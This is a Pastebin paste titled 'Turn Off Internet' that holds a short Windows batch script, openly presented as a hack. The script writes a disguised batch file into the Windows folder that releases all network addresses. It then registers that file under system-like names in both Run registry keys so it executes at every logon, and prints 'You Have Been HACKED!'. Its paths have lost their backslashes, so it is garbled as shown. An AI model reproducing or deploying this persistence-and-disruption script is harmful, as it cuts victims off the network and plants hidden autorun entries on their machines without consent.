JackHaxor

Turn Off Internet

May 14th, 2017
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. echo @echo off>c:windowswimn32.bat
  2. echo break off>>c:windowswimn32.bat
  3. echo ipconfig/release_all>>c:windowswimn32.bat
  4. echo end>>c:windowswimn32.bat
  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  7. echo You Have Been HACKED!
  8. PAUSE
  9.  
  10. .bat
Add Comment
Please, Sign In to add comment